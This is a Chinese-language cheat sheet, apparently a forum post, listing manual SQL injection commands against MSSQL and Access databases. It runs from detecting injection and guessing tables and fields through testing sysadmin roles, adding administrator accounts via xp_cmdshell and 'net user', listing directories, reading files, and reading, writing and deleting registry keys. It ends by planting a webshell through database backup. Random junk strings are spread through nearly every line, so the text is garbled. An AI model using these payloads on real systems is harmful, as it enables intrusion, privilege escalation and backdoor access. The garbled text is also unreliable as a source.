手动方式SQL注入脚本命令

1.判断是否有注入;and 1=1 ;and 1=2 cF{5[?wS  
　　2.初步判断是否是mssql ;and user>0 rq'Cj<=Zj  
"<b~pfCOQk  
　　3.注入参数是字符'and [查询条件] and ''=' F*QZVg+<*X  
sOA!Sl  
　　4.搜索时没过滤参数的'and [查询条件] and '%25'=' s>`$]6wPa  
l<  8RG@  
　　5.判断数据库系统 lV!ecJw$  
b}'XDw   
　　;and (select count(*) from sysobjects)>0 mssql kO
R5'rh  
5_";EED  
　　;and (select count(*) from msysobjects)>0 access %v=z|d5-3  
|__\Vn  
VgG*y#Qf$  
pUby0)}t  
　　6.猜数据库 ;and (select Count(*) from [数据库名])>0 hKv3;jcd  
UlQZw*ce  
　　7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ^G'8!!ys  
zt{?Ntb  
　　8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 S)Cd1`Gf  
$7~k#_#PC  
　　9.(1)猜字段的ascii值(access) ws9F~LmLbr  
*44^M{ti<  
　　;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 l]RO'  
01Bs7@"+  
　　(2)猜字段的ascii值(mssql) ,aS6|~ac4  
u )+;(Vd  
　　;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 >-rDBk ;K  
)M(;:#le  
　　10.测试权限结构(mssql) c;DWSgIw  
'J~{8w,.  
C;2!c
 
O-- "\4  
　　;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?H8w/{J   
Dg~r%F
 
　　;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- gaBt;@?:Q  
[/uqH  
　　;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tWL3F?wd  
OI;0dS  
　　;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- yQb^]|XG  
# JHicx\8l  
　　;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- zOA{S~>  
4$9WJ~V{  
　　;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- O~yPe.  
~M`-sSjZs  
　　;and 1=(select IS_MEMBER('db_owner'));-- Lf_`8Ux  
`` (D01<  
0/?V _  
1iBOf8  
　　11.添加mssql和系统的帐户 5Z{i't0CQ  
.Ymoh>JRL  
　　;exec master.dbo.sp_addlogin username;-- @!/
w'k8  
　　;exec master.dbo.sp_password null,username,password;-- vU&I,:72 H  
HSHY0  
　　;exec master.dbo.sp_addsrvrolemember sysadmin username;-- P!yE{_%  
D?~`L[}I!}  
　　;exec master.dbo.xp_cmdshell 'net user username password 82#7TX4  
:lz@G4=C  
　　/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- KP" lz  
a$!|)+  
　　;exec master.dbo.xp_cmdshell 'net user username password /add';-- *BzqAi0  
d dB}mk6  
　　;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 
4:<74B  
5Mm><"0  
R}lS@w1  
"PH}\Dl=  
　　12.(1)遍历目录 o= V
zVg  
E O^j,x g  
　　;create table dirs(paths varchar(100), id int) /Zw^EM6c  
j4H]HGHv  
　　;insert dirs exec master.dbo.xp_dirtree 'c:\' ]kUF>Wp
 
BL1$~0  
　　;and (select top 1 paths from dirs)>0 F9(*MP|  
/bm$G"%d  
　　;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) y]$%>N0vLX  
Dz$GPA   
U{(B)dFTH  

$%9.qy\8  
　　(2)遍历目录 !v(j#N< m  
C5mq@$6  
　　;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- SQ7Ws u>T@  
　　;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 7i?"akr4  
M qq/k J  
　　;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ~bU!4P}4j  
csP 5R3  
　　;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?m5@ 635  
Htd-E^/
 
　　;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 :tclYX  
KEF"`VTB@  
*aF#on{  
-_&"Q4FR;+  
　　13.mssql中的存储过程 5,  
5etbJk  
　　xp_regenumvalues 注册表根键, 子键 #(6
^1S%  
uCGJe1!Ai>  
　　;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 =\mAvVe  
]hY'A>4Uq  
　　xp_regread 根键,子键,键值名 ?;NC(Z,  
9UlR fl  
　　;exec xp_regread G3O`r8oZcJ  
Gs^hqT;h  
　　'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Wj0=cIb  
n[$bk_S  
　　xp_regwrite 根键,子键, 值名, 值类型, 值 Cx(|ZD^  
"%$jl0i_c  
　　值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 B3 fKb#T  
Q;A1&UA2  
　　;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 o%dKi]  
D"kss5>w  
　　xp_regdeletevalue 根键,子键,值名 v eP)ElX  
1#rcxUSi
 
　　exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 .bcoH  
KLVkPix;$  
　　xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 +o+e*B7Eh  
NN(ZH73  
t5
:4'%|  
GG0l\!2)  
　　14.mssql的backup创建webshell 0X6|pC~  
v%gkQa
 
　　use model 9K~0:c  
h/`]=kCl  
　　create table cmd(str image); =[]V$<G'w{  
o@SL0H-6|  
　　insert into cmd(str) values (''); fyYH
wG  
\@IEqm6  
　　backup database model to disk='c:\l.asp'; !EO
*xxQ  
f;os\8JdM  
J_PAWW  
)IN!CmpN  
　　15.mssql内置函数 &/XRiK1"0  
9i+OYWUO  
　　;and (select @@version)>0 获得Windows的版本号
&sh5|5EC  
^d2#J  
　　;and user_name()='dbo' 判断当前系统的连接用户是不是sa e5\/:HpI  
kn2s,%\`<p  
　　;and (select user_name())>0 爆当前系统的连接用户 2% ],0,o  
@PH`Wn#S  
　　;and (select db_name())>0 得到当前连接的数据库 Ht >5R  
KO*# ^+
g  
U$zd3a_(  
vTE3-v[i  
　　16.简洁的webshell kD_Ac{{<  
-G\svwv@)  
　　use model $;GH -+  
Vl"20):  
　　create table cmd(str image); Ltv!;
^Q5  
3y#0Lb-y  
　　insert into cmd(str) values (''); T!![7Rs  
c~1+5&  
　　backup database model to disk='g:\wwwtest\l.asp';

学习.......... 呵呵 我是好人

这个和好人有关系吗？